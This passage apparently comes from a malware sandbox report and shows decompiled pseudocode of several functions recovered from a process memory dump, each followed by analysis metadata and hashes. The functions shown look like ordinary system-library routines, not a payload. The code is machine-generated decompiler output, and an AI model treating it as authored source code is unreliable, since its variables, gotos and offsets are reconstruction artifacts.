              				signed short _t177;
              				signed short _t181;
              				unsigned int _t182;
              				signed int _t185;
              				signed int _t213;
              				signed int _t225;
              				short _t233;
              				signed char _t234;
              				signed int _t242;
              				signed int _t243;
              				signed int _t244;
              				signed int _t245;
              				signed int _t250;
              				void* _t251;
              				signed short* _t254;
              				void* _t255;
              				signed int _t256;
              				void* _t257;
              				signed short* _t260;
              				signed short _t265;
              				signed short* _t269;
              				signed short _t271;
              				signed short** _t272;
              				signed short* _t275;
              				signed short _t282;
              				signed short _t283;
              				signed short _t290;
              				signed short _t299;
              				signed short _t307;
              				signed int _t308;
              				signed short _t311;
              				signed short* _t315;
              				signed short _t316;
              				void* _t317;
              				void* _t319;
              				signed short* _t321;
              				void* _t322;
              				void* _t323;
              				unsigned int _t324;
              				signed int _t325;
              				void* _t326;
              				signed int _t327;
              				signed int _t329;
              
              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
              				_v8 =  *0x4cbd360 ^ _t329;
              				_t157 = _a8;
              				_t321 = _a4;
              				_t315 = __edx;
              				_v548 = __ecx;
              				_t305 = _a20;
              				_v560 = _a12;
              				_t260 = _a16;
              				_v564 = __edx;
              				_v580 = _a8;
              				_v572 = _t260;
              				_v544 = _a20;
              				if( *__edx <= 8) {
              					L3:
              					if(_t260 != 0) {
              						 *_t260 = 0;
              					}
              					_t254 =  &_v532;
              					_v588 = 0x208;
              					if((_v548 & 0x00000001) != 0) {
              						_v556 =  *_t315;
              						_v552 = _t315[2];
              						_t161 = E04BFF232( &_v556);
              						_t316 = _v556;
              						_v540 = _t161;
              						goto L17;
              					} else {
              						_t306 = 0x208;
              						_t298 = _t315;
              						_t316 = E04BE6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
              						if(_t316 == 0) {
              							L68:
              							_t322 = 0xc0000033;
              							goto L39;
              						} else {
              							while(_v581 == 0) {
              								_t233 = _v588;
              								if(_t316 > _t233) {
              									_t234 = _v548;
              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
              										_t254 = L04BE4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
              										if(_t254 == 0) {
              											_t169 = 0xc0000017;
              										} else {
              											_t298 = _v564;
              											_v588 = _t316;
              											_t306 = _t316;
              											_t316 = E04BE6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
              											if(_t316 != 0) {
              												continue;
              											} else {
              												goto L68;
              											}
              										}
              									} else {
              										goto L90;
              									}
              								} else {
              									_v556 = _t316;
              									 *((short*)(_t329 + 0x32)) = _t233;
              									_v552 = _t254;
              									if(_t316 < 2) {
              										L11:
              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
              											_t161 = 5;
              										} else {
              											if(_t316 < 6) {
              												L87:
              												_t161 = 3;
              											} else {
              												_t242 = _t254[2] & 0x0000ffff;
              												if(_t242 != 0x5c) {
              													if(_t242 == 0x2f) {
              														goto L16;
              													} else {
              														goto L87;
              													}
              													goto L101;
              												} else {
              													L16:
              													_t161 = 2;
              												}
              											}
              										}
              									} else {
              										_t243 =  *_t254 & 0x0000ffff;
              										if(_t243 == 0x5c || _t243 == 0x2f) {
              											if(_t316 < 4) {
              												L81:
              												_t161 = 4;
              												goto L17;
              											} else {
              												_t244 = _t254[1] & 0x0000ffff;
              												if(_t244 != 0x5c) {
              													if(_t244 == 0x2f) {
              														goto L60;
              													} else {
              														goto L81;
              													}
              												} else {
              													L60:
              													if(_t316 < 6) {
              														L83:
              														_t161 = 1;
              														goto L17;
              													} else {
              														_t245 = _t254[2] & 0x0000ffff;
              														if(_t245 != 0x2e) {
              															if(_t245 == 0x3f) {
              																goto L62;
              															} else {
              																goto L83;
              															}
              														} else {
              															L62:
              															if(_t316 < 8) {
              																L85:
              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
              																goto L17;
              															} else {
              																_t250 = _t254[3] & 0x0000ffff;
              																if(_t250 != 0x5c) {
              																	if(_t250 == 0x2f) {
              																		goto L64;
              																	} else {
              																		goto L85;
              																	}
              																} else {
              																	L64:
              																	_t161 = 6;
              																	goto L17;
              																}
              															}
              														}
              													}
              												}
              											}
              											goto L101;
              										} else {
              											goto L11;
              										}
              									}
              									L17:
              									if(_t161 != 2) {
              										_t162 = _t161 - 1;
              										if(_t162 > 5) {
              											goto L18;
              										} else {
              											switch( *((intOrPtr*)(_t162 * 4 +  &M04BE45F8))) {
              												case 0:
              													_v568 = 0x4ba1078;
              													__eax = 2;
              													goto L20;
              												case 1:
              													goto L18;
              												case 2:
              													_t163 = 4;
              													goto L19;
              											}
              										}
              										goto L41;
              									} else {
              										L18:
              										_t163 = 0;
              										L19:
              										_v568 = 0x4ba11c4;
              									}
              									L20:
              									_v588 = _t163;
              									_v564 = _t163 + _t163;
              									_t306 =  *_v568 & 0x0000ffff;
              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
              									_v576 = _t265;
              									if(_t265 > 0xfffe) {
              										L90:
              										_t322 = 0xc0000106;
              									} else {
              										if(_t321 != 0) {
              											if(_t265 > (_t321[1] & 0x0000ffff)) {
              												if(_v580 != 0) {
              													goto L23;
              												} else {
              													_t322 = 0xc0000106;
              													goto L39;
              												}
              											} else {
              												_t177 = _t306;
              												goto L25;
              											}
              											goto L101;
              										} else {
              											if(_v580 == _t321) {
              												_t322 = 0xc000000d;
              											} else {
              												L23:
              												_t173 = L04BE4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
              												_t269 = _v592;
              												_t269[2] = _t173;
              												if(_t173 == 0) {
              													_t322 = 0xc0000017;
              												} else {
              													_t316 = _v556;
              													 *_t269 = 0;
              													_t321 = _t269;
              													_t269[1] = _v576;
              													_t177 =  *_v568 & 0x0000ffff;
              													L25:
              													_v580 = _t177;
              													if(_t177 == 0) {
              														L29:
              														_t307 =  *_t321 & 0x0000ffff;
              													} else {
              														_t290 =  *_t321 & 0x0000ffff;
              														_v576 = _t290;
              														_t310 = _t177 & 0x0000ffff;
              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
              															_t307 =  *_t321 & 0xffff;
              														} else {
              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
              															E04C0F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
              															_t329 = _t329 + 0xc;
              															_t311 = _v580;
              															_t225 =  *_t321 + _t311 & 0x0000ffff;
              															 *_t321 = _t225;
              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
              															}
              															goto L29;
              														}
              													}
              													_t271 = _v556 - _v588 + _v588;
              													_v580 = _t307;
              													_v576 = _t271;
              													if(_t271 != 0) {
              														_t308 = _t271 & 0x0000ffff;
              														_v588 = _t308;
              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
              															E04C0F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
              															_t329 = _t329 + 0xc;
              															_t213 =  *_t321 + _v576 & 0x0000ffff;
              															 *_t321 = _t213;
              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
              															}
              														}
              													}
              													_t272 = _v560;
              													if(_t272 != 0) {
              														 *_t272 = _t321;
              													}
              													_t306 = 0;
              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
              													_t275 = _v572;
              													if(_t275 != 0) {
              														_t306 =  *_t275;
              														if(_t306 != 0) {
              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
              														}
              													}
              													_t181 = _v544;
              													if(_t181 != 0) {
              														 *_t181 = 0;
              														 *((intOrPtr*)(_t181 + 4)) = 0;
              														 *((intOrPtr*)(_t181 + 8)) = 0;
              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
              														if(_v540 == 5) {
              															_t182 = E04BC52A5(1);
              															_v588 = _t182;
              															if(_t182 == 0) {
              																E04BDEB70(1, 0x4cb79a0);
              																goto L38;
              															} else {
              																_v560 = _t182 + 0xc;
              																_t185 = E04BDAA20( &_v556, _t182 + 0xc,  &_v556, 1);
              																if(_t185 == 0) {
              																	_t324 = _v588;
              																	goto L97;
              																} else {
              																	_t306 = _v544;
              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
              																	 *(_t306 + 4) = _t282;
              																	_v576 = _t282;
              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
              																	 *_t306 = _t325;
              																	if( *_t282 == 0x5c) {
              																		_t149 = _t325 - 2; // -2
              																		_t283 = _t149;
              																		 *_t306 = _t283;
              																		 *(_t306 + 4) = _v576 + 2;
              																		_t185 = _t283 & 0x0000ffff;
              																	}
              																	_t324 = _v588;
              																	 *(_t306 + 2) = _t185;
              																	if((_v548 & 0x00000002) == 0) {
              																		L97:
              																		asm("lock xadd [esi], eax");
              																		if((_t185 | 0xffffffff) == 0) {
              																			_push( *((intOrPtr*)(_t324 + 4)));
              																			E04C095D0();
              																			L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
              																		}
              																	} else {
              																		 *(_t306 + 0xc) = _t324;
              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
              																	}
              																	goto L38;
              																}
              															}
              															goto L41;
              														}
              													}
              													L38:
              													_t322 = 0;
              												}
              											}
              										}
              									}
              									L39:
              									if(_t254 !=  &_v532) {
              										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
              									}
              									_t169 = _t322;
              								}
              								goto L41;
              							}
              							goto L68;
              						}
              					}
              					L41:
              					_pop(_t317);
              					_pop(_t323);
              					_pop(_t255);
              					return E04C0B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
              				} else {
              					_t299 = __edx[2];
              					if( *_t299 == 0x5c) {
              						_t256 =  *(_t299 + 2) & 0x0000ffff;
              						if(_t256 != 0x5c) {
              							if(_t256 != 0x3f) {
              								goto L2;
              							} else {
              								goto L50;
              							}
              						} else {
              							L50:
              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
              								goto L2;
              							} else {
              								_t251 = E04C03D43(_t315, _t321, _t157, _v560, _v572, _t305);
              								_pop(_t319);
              								_pop(_t326);
              								_pop(_t257);
              								return E04C0B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
              							}
              						}
              					} else {
              						L2:
              						_t260 = _v572;
              						goto L3;
              					}
              				}
              				L101:
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62c1bccd81afbd535bdd55023dca1711f2bcd4940eae13d673537c0fc1465ef5
              • Instruction ID: 245d05ac57588d5078053bab60d2bd10a9d78a9dafc0d7e377991d67505c839c
              • Opcode Fuzzy Hash: 62c1bccd81afbd535bdd55023dca1711f2bcd4940eae13d673537c0fc1465ef5
              • Instruction Fuzzy Hash: 49F16E746083118BC724CF1AC580A3AB7F2EFC8718F1549AEF486DB291E774E991DB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E04BF513A(intOrPtr __ecx, void* __edx) {
              				signed int _v8;
              				signed char _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				char _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				intOrPtr _v44;
              				intOrPtr _v48;
              				char _v63;
              				char _v64;
              				signed int _v72;
              				signed int _v76;
              				signed int _v80;
              				signed int _v84;
              				signed int _v88;
              				signed char* _v92;
              				signed int _v100;
              				signed int _v104;
              				char _v105;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t157;
              				signed int _t159;
              				signed int _t160;
              				unsigned int* _t161;
              				intOrPtr _t165;
              				signed int _t172;
              				signed char* _t181;
              				intOrPtr _t189;
              				intOrPtr* _t200;
              				signed int _t202;
              				signed int _t203;
              				char _t204;
              				signed int _t207;
              				signed int _t208;
              				void* _t209;
              				intOrPtr _t210;
              				signed int _t212;
              				signed int _t214;
              				signed int _t221;
              				signed int _t222;
              				signed int _t226;
              				intOrPtr* _t232;
              				signed int _t233;
              				signed int _t234;
              				intOrPtr _t237;
              				intOrPtr _t238;
              				intOrPtr _t240;
              				void* _t245;
              				signed int _t246;
              				signed int _t247;
              				void* _t248;
              				void* _t251;
              				void* _t252;
              				signed int _t253;
              				signed int _t255;
              				signed int _t256;
              
              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
              				_v8 =  *0x4cbd360 ^ _t255;
              				_v32 = _v32 & 0x00000000;
              				_t251 = __edx;
              				_t237 = __ecx;
              				_t212 = 6;
              				_t245 =  &_v84;
              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
              				_v48 = __ecx;
              				_v36 = _t207;
              				_t157 = memset(_t245, 0, _t212 << 2);
              				_t256 = _t255 + 0xc;
              				_t246 = _t245 + _t212;
              				if(_t207 == 2) {
              					_t247 =  *(_t237 + 0x60);
              					_t208 =  *(_t237 + 0x64);
              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
              					_v104 = _t159;
              					_v76 = _t159;
              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
              					_v100 = _t160;
              					_v72 = _t160;
              					L19:
              					_v80 = _t208;
              					_v84 = _t247;
              					L8:
              					_t214 = 0;
              					if( *(_t237 + 0x74) > 0) {
              						_t82 = _t237 + 0x84; // 0x124
              						_t161 = _t82;
              						_v92 = _t161;
              						while( *_t161 >> 0x1f != 0) {
              							_t200 = _v92;
              							if( *_t200 == 0x80000000) {
              								break;
              							}
              							_t214 = _t214 + 1;
              							_t161 = _t200 + 0x10;
              							_v92 = _t161;
              							if(_t214 <  *(_t237 + 0x74)) {
              								continue;
              							}
              							goto L9;
              						}
              						_v88 = _t214 << 4;
              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
              						_t165 = 0;
              						asm("adc eax, [ecx+edx+0x7c]");
              						_v24 = _t165;
              						_v28 = _v40;
              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
              						_t221 = _v40;
              						_v16 =  *_v92;
              						_v32 =  &_v28;
              						if( *(_t237 + 0x4e) >> 0xf == 0) {
              							goto L9;
              						}
              						_t240 = _v48;
              						if( *_v92 != 0x80000000) {
              							goto L9;
              						}
              						 *((intOrPtr*)(_t221 + 8)) = 0;
              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
              						_t226 = 0;
              						_t181 = _t251 + 0x66;
              						_v88 = 0;
              						_v92 = _t181;
              						do {
              							if( *((char*)(_t181 - 2)) == 0) {
              								goto L31;
              							}
              							_t226 = _v88;
              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
              								_t181 = E04C0D0F0(1, _t226 + 0x20, 0);
              								_t226 = _v40;
              								 *(_t226 + 8) = _t181;
              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
              								L34:
              								if(_v44 == 0) {
              									goto L9;
              								}
              								_t210 = _v44;
              								_t127 = _t210 + 0x1c; // 0x1c
              								_t249 = _t127;
              								E04BE2280(_t181, _t127);
              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
              									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
              								}
              								_t189 = L04BE4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
              								if(_t189 != 0) {
              									 *((intOrPtr*)(_t189 + 8)) = _v20;
              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
              									 *_t232 = _t232 + 0x10;
              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
              									E04C0F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
              									_t256 = _t256 + 0xc;
              								}
              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
              								E04BDFFB0(_t210, _t249, _t249);
              								_t222 = _v76;
              								_t172 = _v80;
              								_t208 = _v84;
              								_t247 = _v88;
              								L10:
              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
              								_v44 = _t238;
              								if(_t238 != 0) {
              									 *0x4cbb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
              									_v44();
              								}
              								_pop(_t248);
              								_pop(_t252);
              								_pop(_t209);
              								return E04C0B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
              							}
              							_t181 = _v92;
              							L31:
              							_t226 = _t226 + 1;
              							_t181 =  &(_t181[0x18]);
              							_v88 = _t226;
              							_v92 = _t181;
              						} while (_t226 < 4);
              						goto L34;
              					}
              					L9:
              					_t172 = _v104;
              					_t222 = _v100;
              					goto L10;
              				}
              				_t247 = _t246 | 0xffffffff;
              				_t208 = _t247;
              				_v84 = _t247;
              				_v80 = _t208;
              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
              					_t233 = _v72;
              					_v105 = _v64;
              					_t202 = _v76;
              				} else {
              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
              					_v105 = 1;
              					if(_v63 <= _t204) {
              						_v63 = _t204;
              					}
              					_t202 = _v76 |  *(_t251 + 0x40);
              					_t233 = _v72 |  *(_t251 + 0x44);
              					_t247 =  *(_t251 + 0x38);
              					_t208 =  *(_t251 + 0x3c);
              					_v76 = _t202;
              					_v72 = _t233;
              					_v84 = _t247;
              					_v80 = _t208;
              				}
              				_v104 = _t202;
              				_v100 = _t233;
              				if( *((char*)(_t251 + 0xc4)) != 0) {
              					_t237 = _v48;
              					_v105 = 1;
              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
              						_t237 = _v48;
              					}
              					_t203 = _t202 |  *(_t251 + 0xb8);
              					_t234 = _t233 |  *(_t251 + 0xbc);
              					_t247 = _t247 &  *(_t251 + 0xb0);
              					_t208 = _t208 &  *(_t251 + 0xb4);
              					_v104 = _t203;
              					_v76 = _t203;
              					_v100 = _t234;
              					_v72 = _t234;
              					_v84 = _t247;
              					_v80 = _t208;
              				}
              				if(_v105 == 0) {
              					_v36 = _v36 & 0x00000000;
              					_t208 = 0;
              					_t247 = 0;
              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
              					goto L19;
              				} else {
              					_v36 = 1;
              					goto L8;
              				}
              			}

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48292fd4b99992ce7888326a3b2cc060855ffb14ed59fc5af456f76abdbdedf7
              • Instruction ID: d4592d780464d8388b3accef2a97ea6e326a198697587e91cc861831133e0acb
              • Opcode Fuzzy Hash: 48292fd4b99992ce7888326a3b2cc060855ffb14ed59fc5af456f76abdbdedf7
              • Instruction Fuzzy Hash: 8BC103756083809FD764CF28C580A5AFBE1FF88308F144AADF9998B352D771E945CB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E04BCC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
              				signed int _v8;
              				char _v1036;
              				signed int _v1040;
              				char _v1048;
              				signed int _v1052;
              				signed char _v1056;
              				void* _v1058;
              				char _v1060;
              				signed int _v1064;
              				void* _v1068;
              				intOrPtr _v1072;
              				void* _v1084;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t70;
              				intOrPtr _t72;
              				signed int _t74;
              				intOrPtr _t77;
              				signed int _t78;
              				signed int _t81;
              				void* _t101;
              				signed int _t102;
              				signed int _t107;
              				signed int _t109;
              				signed int _t110;
              				signed char _t111;
              				signed int _t112;
              				signed int _t113;
              				signed int _t114;
              				intOrPtr _t116;
              				void* _t117;
              				char _t118;
              				void* _t120;
              				char _t121;
              				signed int _t122;
              				signed int _t123;
              				signed int _t125;
              
              				_t125 = (_t123 & 0xfffffff8) - 0x424;
              				_v8 =  *0x4cbd360 ^ _t125;
              				_t116 = _a4;
              				_v1056 = _a16;
              				_v1040 = _a24;
              				if(E04BD6D30( &_v1048, _a8) < 0) {
              					L4:
              					_pop(_t117);
              					_pop(_t120);
              					_pop(_t101);
              					return E04C0B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
              				}
              				_t70 = _a20;
              				if(_t70 >= 0x3f4) {
              					_t121 = _t70 + 0xc;
              					L19:
              					_t107 =  *( *[fs:0x30] + 0x18);
              					__eflags = _t107;
              					if(_t107 == 0) {
              						L60:
              						_t68 = 0xc0000017;
              						goto L4;
              					}
              					_t72 =  *0x4cb7b9c; // 0x0
              					_t74 = L04BE4620(_t107, _t107, _t72 + 0x180000, _t121);
              					_v1064 = _t74;
              					__eflags = _t74;
              					if(_t74 == 0) {
              						goto L60;
              					}
              					_t102 = _t74;
              					_push( &_v1060);
              					_push(_t121);
              					_push(_t74);
              					_push(2);
              					_push( &_v1048);
              					_push(_t116);
              					_t122 = E04C09650();
              					__eflags = _t122;
              					if(_t122 >= 0) {
              						L7:
              						_t114 = _a12;
              						__eflags = _t114;
              						if(_t114 != 0) {
              							_t77 = _a20;
              							L26:
              							_t109 =  *(_t102 + 4);
              							__eflags = _t109 - 3;
              							if(_t109 == 3) {
              								L55:
              								__eflags = _t114 - _t109;
              								if(_t114 != _t109) {
              									L59:
              									_t122 = 0xc0000024;
              									L15:
              									_t78 = _v1052;
              									__eflags = _t78;
              									if(_t78 != 0) {
              										L04BE77F0( *( *[fs:0x30] + 0x18), 0, _t78);
              									}
              									_t68 = _t122;
              									goto L4;
              								}
              								_t110 = _v1056;
              								_t118 =  *((intOrPtr*)(_t102 + 8));
              								_v1060 = _t118;
              								__eflags = _t110;
              								if(_t110 == 0) {
              									L10:
              									_t122 = 0x80000005;
              									L11:
              									_t81 = _v1040;
              									__eflags = _t81;
              									if(_t81 == 0) {
              										goto L15;
              									}
              									__eflags = _t122;
              									if(_t122 >= 0) {
              										L14:
              										 *_t81 = _t118;
              										goto L15;
              									}
              									__eflags = _t122 - 0x80000005;
              									if(_t122 != 0x80000005) {
              										goto L15;
              									}
              									goto L14;
              								}
              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
              									goto L10;
              								}
              								_push( *((intOrPtr*)(_t102 + 8)));
              								_t59 = _t102 + 0xc; // 0xc
              								_push(_t110);
              								L54:
              								E04C0F3E0();
              								_t125 = _t125 + 0xc;
              								goto L11;
              							}
              							__eflags = _t109 - 7;
              							if(_t109 == 7) {
              								goto L55;
              							}
              							_t118 = 4;
              							__eflags = _t109 - _t118;
              							if(_t109 != _t118) {
              								__eflags = _t109 - 0xb;
              								if(_t109 != 0xb) {
              									__eflags = _t109 - 1;
              									if(_t109 == 1) {
              										__eflags = _t114 - _t118;
              										if(_t114 != _t118) {
              											_t118 =  *((intOrPtr*)(_t102 + 8));
              											_v1060 = _t118;
              											__eflags = _t118 - _t77;
              											if(_t118 > _t77) {
              												goto L10;
              											}
              											_push(_t118);
              											_t56 = _t102 + 0xc; // 0xc
              											_push(_v1056);
              											goto L54;
              										}
              										__eflags = _t77 - _t118;
              										if(_t77 != _t118) {
              											L34:
              											_t122 = 0xc0000004;
              											goto L15;
              										}
              										_t111 = _v1056;
              										__eflags = _t111 & 0x00000003;
              										if((_t111 & 0x00000003) == 0) {
              											_v1060 = _t118;
              											__eflags = _t111;
              											if(__eflags == 0) {
              												goto L10;
              											}
              											_t42 = _t102 + 0xc; // 0xc
              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
              											_v1048 =  *((intOrPtr*)(_t102 + 8));
              											_push(_t111);
              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
              											_push(0);
              											_push( &_v1048);
              											_t122 = E04C013C0(_t102, _t118, _t122, __eflags);
              											L44:
              											_t118 = _v1072;
              											goto L11;
              										}
              										_t122 = 0x80000002;
              										goto L15;
              									}
              									_t122 = 0xc0000024;
              									goto L44;
              								}
              								__eflags = _t114 - _t109;
              								if(_t114 != _t109) {
              									goto L59;
              								}
              								_t118 = 8;
              								__eflags = _t77 - _t118;
              								if(_t77 != _t118) {
              									goto L34;
              								}
              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
              									goto L34;
              								}
              								_t112 = _v1056;
              								_v1060 = _t118;
              								__eflags = _t112;
              								if(_t112 == 0) {
              									goto L10;
              								}
              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
              								goto L11;
              							}
              							__eflags = _t114 - _t118;
              							if(_t114 != _t118) {
              								goto L59;
              							}
              							__eflags = _t77 - _t118;
              							if(_t77 != _t118) {
              								goto L34;
              							}
              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
              								goto L34;
              							}
              							_t113 = _v1056;
              							_v1060 = _t118;
              							__eflags = _t113;
              							if(_t113 == 0) {
              								goto L10;
              							}
              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
              							goto L11;
              						}
              						_t118 =  *((intOrPtr*)(_t102 + 8));
              						__eflags = _t118 - _a20;
              						if(_t118 <= _a20) {
              							_t114 =  *(_t102 + 4);
              							_t77 = _t118;
              							goto L26;
              						}
              						_v1060 = _t118;
              						goto L10;
              					}
              					__eflags = _t122 - 0x80000005;
              					if(_t122 != 0x80000005) {
              						goto L15;
              					}
              					L04BE77F0( *( *[fs:0x30] + 0x18), 0, _t102);
              					L18:
              					_t121 = _v1060;
              					goto L19;
              				}
              				_push( &_v1060);
              				_push(0x400);
              				_t102 =  &_v1036;
              				_push(_t102);
              				_push(2);
              				_push( &_v1048);
              				_push(_t116);
              				_t122 = E04C09650();
              				if(_t122 >= 0) {
              					__eflags = 0;
              					_v1052 = 0;
              					goto L7;
              				}
              				if(_t122 == 0x80000005) {
              					goto L18;
              				}
              				goto L4;
              			}


              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: a47f452f3a05ced78aed9884de338c4f7e46ec955676c34dfa1fb49d1cbf08f3
              • Instruction ID: 74ff52d9409a4ab6ab488fa9b4bc714700f7a76b4615a48721282502ed88560b
              • Opcode Fuzzy Hash: a47f452f3a05ced78aed9884de338c4f7e46ec955676c34dfa1fb49d1cbf08f3
              • Instruction Fuzzy Hash: 298182B56463019FDB25CE14C880B7A77E6EB84359F18C96EED459B640E330FE41CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 39%
              			E04C5B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
              				char _v8;
              				signed int _v12;
              				signed int _t80;
              				signed int _t83;
              				intOrPtr _t89;
              				signed int _t92;
              				signed char _t106;
              				signed int* _t107;
              				intOrPtr _t108;
              				intOrPtr _t109;
              				signed int _t114;
              				void* _t115;
              				void* _t117;
              				void* _t119;
              				void* _t122;
              				signed int _t123;
              				signed int* _t124;
              
              				_t106 = _a12;
              				if((_t106 & 0xfffffffc) != 0) {
              					return 0xc000000d;
              				}
              				if((_t106 & 0x00000002) != 0) {
              					_t106 = _t106 | 0x00000001;
              				}
              				_t109 =  *0x4cb7b9c; // 0x0
